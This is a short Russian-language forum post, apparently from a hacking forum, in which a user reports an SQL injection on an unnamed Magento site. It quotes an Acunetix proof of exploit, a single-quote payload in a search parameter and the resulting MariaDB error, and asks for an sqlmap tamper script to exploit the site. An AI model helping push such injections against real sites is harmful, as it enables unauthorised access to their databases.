25.06.2021, 10:53
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
С нами:
5039606
Репутация:
1
|
|
sql на магенто
/result/?q=1'
Акунетикс нашел sql даже выдернур имя БД
Код:
Proof of Exploit
SQL query - SELECT database()
admin8sasdasd
При отправке через бурп
site/result/?q=1'
Ответ:
Код:
HTTP/1.1 503 Service Unavailable
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''/result/''q=1'')' at line 1
Trace:
Error log record number:
Magento is a trademark of Magento Inc. Copyright © 2010 Magento Inc.
Но при попытки крутануть мапом! Не видит скулю(
Пробывал --text-only
Может какой темпер есть под магенто? |
|
|